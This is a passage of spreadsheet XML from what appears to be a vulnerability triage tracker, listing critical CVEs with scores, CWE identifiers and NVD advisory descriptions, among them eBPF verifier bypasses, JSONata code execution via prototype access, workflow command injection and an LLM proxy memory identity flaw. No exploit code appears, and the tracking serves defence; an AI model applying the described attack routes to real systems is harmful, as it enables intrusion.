        <v>9.300000000000001</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr"/>
      <c r="Q115" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, in the Prevail eBPF verifier, EbpfTransformer::add() silently skips offset-variable updates when the destination register carries a non-singleton typeset (two or more simultaneously possible pointer types). Subsequent bounds checks use the stale offset and accept out-of-bounds memory accesses, so a crafted BPF program passes verification even though it would corrupt memory at runtime. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="S115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53670</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53671</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr"/>
      <c r="Q116" s="5" t="inlineStr">
        <is>
          <t>CWE-682</t>
        </is>
      </c>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>PREVAIL is a Polynomial-Runtime EBPF Verifier using an Abstract Interpretation Layer. Prior to version 0.2.4, the abstract transformer in prevail treats writes through a T_CTX-typed base register as a silent no-op: do_mem_store in src/crab/ebpf_transformer.cpp only models T_STACK stores, and the checker's T_CTX bounds arm never tests AccessType::write. An attacker can craft an eBPF program that overwrites a context field (e.g., ctx-&gt;data), reload that field typed as T_PACKET, and dereference an attacker-controlled address — and prevail will report the program as safe. This issue has been patched in version 0.2.4.</t>
        </is>
      </c>
      <c r="S116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53671</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55220</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr"/>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr"/>
      <c r="Q117" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>Pimcore is an Open Source Data &amp; Experience Management Platform. Prior to 11.5.19, 12.3.10, and 2026.1.6, Pimcore\Model\DataObject\ClassDefinition\Data\Hotspotimage::getDataFromResource() in models/DataObject/ClassDefinition/Data/Hotspotimage.php passes the field __hotspots object-store column to Pimcore\Tool\Serialize::unserialize() without an allowed-classes restriction after JSON decoding fails. An attacker with a separate capability to write crafted PHP serialized bytes into that column can instantiate available classes and trigger magic methods when an affected DataObject is loaded, which can produce arbitrary file writes or code execution through bundled gadget chains. The related ImageGallery, Block, and Video callers use the same fallback pattern, but the identified June fix changes the Hotspotimage caller only. This issue is fixed for Hotspotimage in versions 11.5.19, 12.3.10, and 2026.1.6.</t>
        </is>
      </c>
      <c r="S117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55220</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55378</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr"/>
      <c r="Q118" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>JS Recon is a JavaScript enumeration and SAST tool. From 1.2.1-beta.1 until 1.3.1-beta.2, the PR Branch Checker workflow in .github/workflows/pr_checker.yml places github.head_ref and github.event.pull_request.head.repo.full_name into BRANCH_NAME and SOURCE_REPO and interpolates those untrusted values into a shell gh pr comment command. A remote user who opens a pull request can use shell metacharacters in a branch or fork name to execute commands in the GitHub Actions runner with the workflow's GITHUB_TOKEN, which has pull-requests write permission. This issue is fixed in version 1.3.1-beta.2.</t>
        </is>
      </c>
      <c r="S118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55378</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-57910</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr"/>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr"/>
      <c r="Q119" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-347, CWE-494</t>
        </is>
      </c>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in the WatchGuard Agent allows an unauthenticated attacker with network access to cause the agent to execute arbitrary code with elevated privileges.</t>
        </is>
      </c>
      <c r="S119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-57910</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63310</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr"/>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr">
        <is>
          <t>pip:nltk</t>
        </is>
      </c>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr"/>
      <c r="P120" s="5" t="inlineStr"/>
      <c r="Q120" s="5" t="inlineStr">
        <is>
          <t>CWE-494</t>
        </is>
      </c>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>## Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-5wp5-5229-5g6q. This link is maintained to preserve external references.
## Original Description
NLTK before 3.9.3 fails to verify file integrity after downloading packages and before extraction in the downloader module. Attackers can perform man-in-the-middle attacks or DNS poisoning to inject malicious package contents that are extracted without validation.</t>
        </is>
      </c>
      <c r="S120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63310</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-65641</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr"/>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr"/>
      <c r="Q121" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>A vulnerability allowing an unauthenticated network attacker to coerce SMB authentication from the service account.</t>
        </is>
      </c>
      <c r="S121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-65641</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68929</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr"/>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr"/>
      <c r="Q122" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-862</t>
        </is>
      </c>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>FastGPT is an open-source LLM platform for building AI applications on a knowledge base. In versions prior to 4.15.2, the WeChat (iLink) share-channel endpoints authorize requests using only the public shareId, with no authenticated identity or team-ownership check. As a result, an unauthenticated attacker who knows a victim team's shareId can take that team's WeChat bot offline or hijack the channel to their own bot: the logout endpoint is gated only by an existence check yet wipes the outLink's stored WeChat token, and the QR-code status endpoint performs no authorization at all and writes attacker-supplied bot credentials into the outLink identified by shareId. By generating a QR for a victim shareId, scanning it with their own WeChat, and calling the status endpoint, an attacker binds the victim team's app to the attacker's bot, exposing the app's private responses, displacing the legitimate binding, and consuming the victim's resources. The shareId is exposed in every shared chat URL, iframe, and embed, so it is not a secret. This issue is fixed in version 4.15.2.</t>
        </is>
      </c>
      <c r="S122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68929</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73251</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr"/>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr"/>
      <c r="Q123" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.23, a network attacker can impersonate a TLS server to a Mongoose client configured with a multi-certificate CA bundle. In src/tls_builtin.c, the mg_tls_init() function stores the bundle in tls-&gt;ca_bundle_der while tls-&gt;ca_der.len remains zero, and mg_tls_recv_cert() uses tls_bundle_find() to accept a Common Name match without calling mg_tls_verify_cert_signature(). A forged self-signed certificate can therefore satisfy hostname and CertificateVerify checks and enable interception, credential disclosure, traffic modification, and malicious responses. This issue is fixed in version 7.23.</t>
        </is>
      </c>
      <c r="S123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73251</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77413</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr"/>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr"/>
      <c r="Q124" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.0, the src/functions.js lookup function lacked an Object.prototype.hasOwnProperty check and allowed crafted expressions to access inherited prototype members. An attacker able to supply an expression could use inherited prototype setters and getters, constructor access, valueOf, and process.getBuiltinModule to reach the child_process module and execute arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.0.</t>
        </is>
      </c>
      <c r="S124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77413</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77414</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr"/>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr"/>
      <c r="Q125" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.1, the src/jsonata.js environment.lookup function used a bypassable hasOwnProperty check. Crafted expressions could use $hasOwnProperty, $spread, $string, prototype access, and $constructor to reach the object prototype and invoke process.getBuiltinModule with child_process, executing arbitrary code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.1.</t>
        </is>
      </c>
      <c r="S125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77414</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77415</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr"/>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr"/>
      <c r="Q126" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>JSONata is a JSON query and transformation language. Prior to 1.8.8 and 2.2.1, crafted JSONata expressions could chain several object-integrity weaknesses to execute arbitrary code. The chain could overwrite $clone to mutate objects through evaluateTransformExpression, expose and deconstruct JSONata functions or lambdas through $merge.*, replace proc.arguments.forEach used by applyProcedure, and forge internal lambda state. These primitives allowed an attacker to reach prototype getters, prototype and constructor access, and process.getBuiltinModule with child_process, executing code with the privileges of the host process. This issue is fixed in versions 1.8.8 and 2.2.1.</t>
        </is>
      </c>
      <c r="S126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77415</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77644</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>0b655efc-079c-4cb9-9e8d-164871239f4e</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr"/>
      <c r="Q127" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-620</t>
        </is>
      </c>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>A critical bypass access control vulnerability has been reported in PTC Windchill Risk and Reliability (WRR) Enterprise Edition.</t>
        </is>
      </c>
      <c r="S127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77644</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77776</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr"/>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr"/>
      <c r="Q128" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>Headroom's LLM proxy derives the memory owner from the x-headroom-user-id request header. The header is read directly at several points in headroom/proxy/handlers/openai.py, including the chat completion and websocket paths, and nothing binds the value to the caller. A client can therefore name another user's identifier and read or write that user's stored LLM memory. The fix introduces a single resolve_memory_identity seam in headroom/proxy/identity.py that honors the header only for loopback or allowlisted callers and otherwise binds the identity to the proxy-token fingerprint or the operating system user. The pip console script binds 127.0.0.1 by default, but the reference docker-compose.yml ships --host 0.0.0.0 with published ports and no required HEADROOM_PROXY_TOKEN, which the server itself warns about at startup, so a deployment following the shipped compose exposes the affected data-plane routes to the network without authentication.</t>
        </is>
      </c>
      <c r="S128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77776</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85391</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr"/>
      <c r="Q129" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>Peppermint through 0.5.5 contains a hardcoded JWT signing secret in docker-compose.yml that allows unauthenticated attackers to forge session tokens for any account. Attackers can use the published secret to mint valid tokens for arbitrary user IDs and access protected endpoints without credentials.</t>
        </is>
      </c>
      <c r="S129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85391</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87929</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E130" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F130" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr"/>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr"/>
      <c r="Q130" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R130" s="5" t="inlineStr">
        <is>
